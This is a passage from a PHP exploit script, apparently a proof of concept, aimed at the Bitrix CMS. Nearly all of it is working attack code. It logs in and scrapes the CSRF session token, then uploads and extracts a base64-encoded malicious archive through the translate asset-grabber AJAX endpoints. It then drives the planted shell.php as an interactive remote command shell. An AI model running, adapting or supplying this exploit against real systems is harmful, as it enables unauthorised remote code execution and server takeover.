\n\n"); $url = $argv[1]; $user = $argv[2]; $passwd = $argv[3]; $ch = curl_init(); @unlink('./cookies.txt'); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080'); print "[+] Logging into Bitrix\n"; curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_POSTFIELDS, "AUTH_FORM=1&TYPE=AUTH&USER_LOGIN={$user}&USER_PASSWORD={$passwd}"); if (!preg_match("/BITRIX_SM_LOGIN/", curl_exec($ch))) die("[-] Login failed!\n"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/"bitrix_sessid":"([^"]+)"/', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n"); print "[+] Uploading malicious archive\n"; @file_put_contents("rce.tar.gz", base64_decode("H4sIAAAAAAAAA+3VQWvCMBQH8F71U+Qw6DyoTaftwaKH4XCHwVDZZRsla582ENvQRPC0z75Y2Jg7THZwIvx/lxfa9/qSlkdNQUr1dKG90wmcKBrsI4+HwffY4GHo8WEQN8to6AWc3wy4x4IT7unL1lhRM+bRWu5+yzt2/0IlE/ftma5laZmfOv6IaWGMLert9ZswFA3SnLIqp+urdDGdP03nz/5suXxMb/3XTmf0o3Qybp/7RPAXvcKKLCNjTtjj2PyHYbyf/yiOY87d4DfzH2L+/0Nyv3qo8q0itqnydCM31MvG7VZyJxUZ9s5e9v8Gd6G1IDsTZa6oZkJrJTNhZVX2d93CWp13XZar6jdl43bS/3ysWx90cHlNAxfTlRJrRuValsSq8qDo3K8FAAAAAAAAAAAAAAAAAAAA4GJ8AJ02kYkAKAAA")); curl_setopt($ch, CURLOPT_URL, "{$url}bitrix/services/main/ajax.php?action=translate.asset.grabber.upload"); curl_setopt($ch, CURLOPT_POSTFIELDS, ["sessid" => $csrf[1], "tarFile" => new CURLFile("rce.tar.gz")]); if (!preg_match('/"status":"success"/', curl_exec($ch))) die("[-] Upload failed!\n"); print "[+] Extracting malicious archive\n"; curl_setopt($ch, CURLOPT_URL, "{$url}bitrix/services/main/ajax.php?action=translate.asset.grabber.extract"); curl_setopt($ch, CURLOPT_POSTFIELDS, ["sessid" => $csrf[1]]); if (!preg_match('/"status":"success"/', curl_exec($ch))) die("[-] Extract failed!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}bitrix/services/main/ajax.php?action=translate.asset.grabber.apply"); curl_setopt($ch, CURLOPT_POSTFIELDS, ["sessid" => $csrf[1], "PROCESS_TOKEN" => 1, "languageId" => "en"]); if (!preg_match('/upload\\\\\/tmp[^"]+"/', curl_exec($ch), $path)) die("[-] Path not found!\n"); $path = str_replace('\/', '/', substr($path[0], 0, -8)); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, "{$url}{$path}/shell.php"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nbitrix-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }